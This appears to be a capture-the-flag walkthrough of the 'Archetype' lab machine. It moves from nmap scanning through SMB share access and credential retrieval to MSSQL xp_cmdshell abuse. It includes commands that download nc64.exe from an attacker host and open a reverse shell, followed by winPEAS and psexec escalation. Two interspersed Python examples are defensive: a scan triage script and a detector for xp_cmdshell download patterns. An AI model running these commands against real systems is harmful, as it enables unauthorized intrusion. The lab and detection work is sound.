Archetype

January 27, 2024

# Nmap 7.94 scan initiated Sat Jan 27 06:26:28 2024 as: nmap -sC -sV -oN nmap -vv 10.129.171.182
Increasing send delay for 10.129.171.182 from 0 to 5 due to 41 out of 136 dropped probes since last increase.
Increasing send delay for 10.129.171.182 from 10 to 20 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.129.171.182
Host is up, received conn-refused (0.25s latency).
Scanned at 2024-01-27 06:26:28 PST for 65s
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE     REASON  VERSION
135/tcp  open  msrpc       syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds syn-ack Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s    syn-ack Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info: 
|   10.129.171.182:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-26T22:25:48
| Not valid after:  2054-01-26T22:25:48
| MD5:   e9c3:8935:ecf0:84f2:0ae1:bbfc:2bfb:9e03
| SHA-1: b9d6:0ba9:1d39:00ae:0a72:743b:2d2a:b996:3945:b5d1
| ms-sql-ntlm-info: 
|   10.129.171.182:1433: 
|     Target_Name: ARCHETYPE
|     NetBIOS_Domain_Name: ARCHETYPE
|     NetBIOS_Computer_Name: ARCHETYPE
|     DNS_Domain_Name: Archetype
|     DNS_Computer_Name: Archetype
|_    Product_Version: 10.0.17763
|_ssl-date: 2024-01-26T22:27:42+00:00; +9s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-26T22:27:32
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-01-26T14:27:31-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59442/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 42495/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 53074/udp): CLEAN (Timeout)
|   Check 4 (port 58756/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h36m09s, deviation: 3h34m41s, median: 8s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 27 06:27:33 2024 -- 1 IP address (1 host up) scanned in 65.86 seconds
nmap -sV -p 445 10.129.171.182
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 06:30 PST
Nmap scan report for 10.129.171.182
Host is up (0.25s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds

I just ran a second nmap scan on port 445 because it bugs out when using scripts.
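As an added example that is not part of the original writeup, here is a small Python triage of the -oN output above: it pulls the open ports and NSE script blocks apart and maps them to the exposures a defender would fix (SMB signing not required, guest access accepted, MSSQL exposed). The SAMPLE_SCAN text is a constructed excerpt of the scan shown above.

```python
import re
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s+\S+\s*(.*)$")

# Constructed excerpt of the nmap -oN output above (only lines the triage looks at).
SAMPLE_SCAN = """\
445/tcp  open  microsoft-ds syn-ack Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s    syn-ack Microsoft SQL Server 2017 14.00.1000.00; RTM
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

def parse_ports(text):
    """Map each open port number -> (service, version string)."""
    found = (PORT_RE.match(l) for l in text.splitlines())
    return {int(m.group(1)): (m.group(4), m.group(5).strip())
            for m in found if m and m.group(3) == "open"}

def parse_scripts(text):
    """Group NSE output: script name -> [body lines]; a '|_' line closes a script."""
    scripts, current = {}, None
    for line in text.splitlines():
        if not line.startswith("|"):
            current = None  # any non-script line ends the open block
            continue
        body = line.lstrip("|_").strip()
        m = re.match(r"^([\w-]+):\s*(.*)$", body) if current is None else None
        if m:
            current = m.group(1)
            scripts[current] = [m.group(2)] if m.group(2) else []
        elif current:
            scripts[current].append(body)
        if line.startswith("|_"):
            current = None
    return scripts

def triage(text):
    """Turn the scan into the exposures a defender should act on."""
    ports, scripts, findings = parse_ports(text), parse_scripts(text), []
    if 445 in ports and any("not required" in l for l in scripts.get("smb2-security-mode", [])):
        findings.append("SMB signing not required on 445: require signing to stop relay attacks")
    if "account_used: guest" in scripts.get("smb-security-mode", []):
        findings.append("SMB guest access accepted: disable guest and review share permissions")
    if 1433 in ports:
        findings.append("MSSQL reachable on 1433: restrict to application hosts, alert on xp_cmdshell")
    return findings
```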

After that we use smbclient to list the shares available over SMB.

smbclient -L 10.129.171.182

Then we connect to the backups share.

# on the attacking machine: open the backups share and download the config file
smbclient \\\\10.129.171.182\\backups
get prod.dtsConfig
exit

# read it locally; the credentials for the next step are in here
cat prod.dtsConfig

# connect to MSSQL as sql_svc with Windows authentication (impacket's mssqlclient)
cd ~/impacket/examples
python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.171.182 -windows-auth

# inside mssqlclient: turn on xp_cmdshell (needs ALTER SETTINGS, i.e. sysadmin/serveradmin)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
# still inside mssqlclient: use xp_cmdshell to pull nc64.exe from the attacking machine's web server
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.68:8000/nc64.exe -outfile nc64.exe"

After that we execute the payload and get the reverse shell connection.

# inside mssqlclient: run nc64.exe so the target connects back to the listener on 10.10.14.68:443
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.68 443"

# on the attacking machine: serve winPEAS over HTTP
cd ~/Downloads
python3 -m http.server

# in the reverse shell on the target: fetch winPEAS
powershell
wget http://10.10.14.68:8000/winPEASx64.exe -outfile winPEASx64.exe
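The xp_cmdshell sequence above (enable it via sp_configure, then call it with a download command) is also the signature a defender can alert on. As an added example that is not from the writeup, this Python detector correlates SQL audit records per session; the AUDIT list is constructed from the statements run above, and the record format (session id, statement text) is an assumption about how the audit is exported.

```python
import re

# Constructed audit records (session_id, statement text), in the order the writeup above
# runs them; in practice these come from SQL Server Audit or an Extended Events session.
AUDIT = [
    (55, "EXEC sp_configure 'show advanced options', 1;"),
    (55, "RECONFIGURE;"),
    (55, "EXEC sp_configure 'xp_cmdshell', 1;"),
    (55, "RECONFIGURE;"),
    (55, 'xp_cmdshell "powershell -c cd C:\\Users\\sql_svc\\Downloads; '
         'wget http://10.10.14.68:8000/nc64.exe -outfile nc64.exe"'),
    (56, "SELECT name FROM sys.tables;"),
]

ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)
SHELL_RE = re.compile(r"\bxp_cmdshell\b", re.I)
# download commands commonly seen inside xp_cmdshell arguments
CRADLE_RE = re.compile(r"\b(wget|curl|iwr|Invoke-WebRequest|DownloadString|DownloadFile|certutil|bitsadmin)\b", re.I)

def classify(statement):
    """Tag one T-SQL statement; benign statements return []."""
    tags = []
    if ENABLE_RE.search(statement):
        tags.append("xp_cmdshell_enabled")
    elif SHELL_RE.search(statement):
        tags.append("xp_cmdshell_exec")
        if CRADLE_RE.search(statement):
            tags.append("download_cradle")
    return tags

def detect(records):
    """Correlate per session: enabling xp_cmdshell and then calling it is the pattern
    above. Returns {session_id: severity} for every session with a tagged statement."""
    seen, verdict = {}, {}
    for session, statement in records:
        tags = classify(statement)
        if not tags:
            continue
        s = seen.setdefault(session, set())
        s.update(tags)
        if {"xp_cmdshell_enabled", "xp_cmdshell_exec"} <= s:
            verdict[session] = "critical" if "download_cradle" in s else "high"
        else:
            verdict[session] = "medium"
    return verdict
```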

Just execute winPEAS.

Then we get the winPEAS result here.

Move to the impacket examples directory.

cd ~/impacket/examples
python3 psexec.py administrator@10.129.171.182
